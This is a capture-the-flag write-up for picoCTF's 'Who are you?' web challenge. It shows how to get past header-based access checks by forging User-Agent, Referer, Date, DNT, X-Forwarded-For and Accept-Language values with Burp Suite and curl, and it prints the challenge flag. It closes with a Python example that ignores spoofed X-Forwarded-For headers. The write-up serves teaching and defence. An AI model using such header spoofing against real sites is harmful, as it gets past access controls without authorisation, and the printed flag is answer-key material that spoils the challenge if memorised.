## Method 1: Burp Suite (recommended)

Use Proxy to intercept the request and send it to Repeater. The `//` notes are annotations showing the server message each header answers; they are not part of the request.

```
GET / HTTP/1.1
Host: mercury.picoctf.net:38322
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: PicoBrowser                     // Only people who use the official PicoBrowser are allowed on this site!
referer: mercury.picoctf.net:38322          // I don't trust users visiting from another site.
Date: Wed, 01 Jun 2018 08:00:00 GMT.        // Sorry, this site only worked in 2018.
DNT:1                                       // I don't trust users who can be tracked.
X-Forwarded-For: 109.75.228.0               // This website is only for people from Sweden.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: sv                         // You're in Sweden but you don't speak Swedish?
Connection: close
```

## Method 2: curl

```
┌──(kali㉿kali)-[~]
└─$ curl http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1073  100  1073    0     0    350      0  0:00:03  0:00:03 --:--:--   351
<h3 style="color:red">Only people who use the official PicoBrowser are allowed on this site!</h3>
```

```
┌──(kali㉿kali)-[~]
└─$ curl --user-agent "picobrowser" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> I don&#39;t trust users visiting from another site.
[1] 65596 65597
grep:   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0don: No such file or directory
```

```
┌──(kali㉿kali)-[~]
└─$ curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1040  100  1040    0     0   2467      0 --:--:-- --:--:-- --:--:--  2470
<h3 style="color:red">Sorry, this site only worked in 2018.</h3>
```

```
┌──(kali㉿kali)-[~]
└─$ curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1046  100  1046    0     0   2419      0 --:--:-- --:--:-- --:--:--  2421
<h3 style="color:red">I don&#39;t trust users who can be tracked.</h3>
```

```
┌──(kali㉿kali)-[~]
└─$ curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1047  100  1047    0     0   2288      0 --:--:-- --:--:-- --:--:--  2316
<h3 style="color:red">This website is only for people from Sweden.</h3>
```

```
┌──(kali㉿kali)-[~]
└─$ curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1056  100  1056    0     0   2402      0 --:--:-- --:--:-- --:--:--  2410
<h3 style="color:red">You&#39;re in Sweden but you don&#39;t speak Swedish?</h3>
```

```
┌──(kali㉿kali)-[~]
└─$ curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1062  100  1062    0     0   2548      0 --:--:-- --:--:-- --:--:--  2546
<h3 style="color:green">What can I say except, you are welcome</h3>
```

```
┌──(kali㉿kali)-[~]
└─$ curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" http://mercury.picoctf.net:38322/
<!DOCTYPE html>
<html lang="en">
<head>
  <title>Who are you?</title>
  <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css" rel="stylesheet">
  <link href="https://getbootstrap.com/docs/3.3/examples/jumbotron-narrow/jumbotron-narrow.css" rel="stylesheet">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
</head>
<body>
  <div class="container">
    <div class="jumbotron">
      <p class="lead"></p>
      <div class="row">
        <div class="col-xs-12 col-sm-12 col-md-12">
          <h3 style="color:green">What can I say except, you are welcome</h3>
        </div>
      </div>
      <br/>
      <b>picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}</b>
    </div>
    <footer class="footer">
      <p>&copy; PicoCTF</p>
    </footer>
  </div>
  <script>
    $(document).ready(function(){
      $(".close").click(function(){
        $("myAlert").alert("close");
      });
    });
  </script>
</body>
</html>
```

```
┌──(kali㉿kali)-[~]
└─$ curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" http://mercury.picoctf.net:38322/ | grep pico
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1062  100  1062    0     0    100      0  0:00:10  0:00:10 --:--:--   220
<b>picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}</b>
```

## Reference

X-Forwarded-For: https://developer.mozilla.org/zh-TW/docs/Web/HTTP/Headers/X-Forwarded-For
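
Every check in this challenge reads a header the client sets itself, so each one is satisfied by adding one header to the request. As an added example (not part of the original writeup or the challenge's code), this is how a server can resolve the client address so that a spoofed `X-Forwarded-For` like the one used above is ignored. The proxy network `10.0.0.0/8`, the function names and all peer addresses are constructed assumptions.

```python
import ipaddress

# Assumption: the reverse proxies we operate live in this network (constructed value).
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def _is_trusted(addr):
    """True if addr belongs to one of our own proxies."""
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(peer, xff_header):
    """Return the address to use for access decisions.

    peer       -- source address of the TCP connection (not settable by a header)
    xff_header -- raw X-Forwarded-For value, or None
    """
    peer_addr = ipaddress.ip_address(peer)
    # Direct connection from an unknown host: the header is entirely
    # client-supplied, so it is ignored.
    if not _is_trusted(peer_addr) or not xff_header:
        return str(peer_addr)

    # Each proxy appends the address it saw, so walk right to left and stop
    # at the first hop that is not one of our own proxies.
    last_verified = peer_addr
    for hop in reversed([h.strip() for h in xff_header.split(",")]):
        try:
            hop_addr = ipaddress.ip_address(hop)
        except ValueError:
            break  # malformed entry: everything to its left is unverifiable
        if not _is_trusted(hop_addr):
            return str(hop_addr)
        last_verified = hop_addr
    return str(last_verified)


if __name__ == "__main__":
    # Constructed requests: (TCP peer, X-Forwarded-For header)
    for peer, xff in [
        ("198.51.100.7", "2.71.255.255"),             # direct, spoofed header
        ("10.0.0.5", "2.71.255.255, 198.51.100.7"),   # spoof prepended, proxy appended real peer
        ("10.0.0.5", None),                           # proxy sent no header
    ]:
        print(peer, xff, "->", client_ip(peer, xff))
```

The same reasoning applies to `User-Agent`, `Referer`, `Date`, `DNT` and `Accept-Language`: none of them has a trusted hop that can vouch for the value, so they are unsuitable as access-control inputs.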